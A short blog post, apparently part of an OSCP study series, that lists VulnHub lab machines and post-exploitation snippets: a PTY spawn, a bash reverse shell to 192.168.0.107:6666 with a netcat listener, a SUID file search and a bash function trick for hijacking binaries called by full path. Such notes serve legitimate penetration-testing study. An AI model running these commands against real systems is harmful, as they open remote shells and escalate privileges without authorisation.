Path to OSCP - Part 2

Related links

• VulnHub
• Tr0ll VM which I rooted
• Tr0ll2 VM which I failed because I didn't think to try shellshock
• Great walkthrough from which I learned the nifty trick of bash function name masking a binary (Snippet 1)

Snippets

Spawn TTY

python -c 'import pty;pty.spawn("/bin/bash")'

Related: Why do you need tty for sudo

Redirect bash to tcp socket

/bin/bash -i >& /dev/tcp/192.168.0.107/6666 0>&1
# then at receiver:
nc -l -n -v -p 6666
# And wait for incoming bash shell

Find SUID/SGUID files for privilege escalation

find / -user root -perm -4000 -print 2>/dev/null

Of course if you can somehow exploit these results, you might get root

Hijack a binary's full path in bash to exec your own code

$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
It works

Of course you might want this if a SUID bit programing is calling some binary by full path and you cannot alter that binary but want to hijack the execution.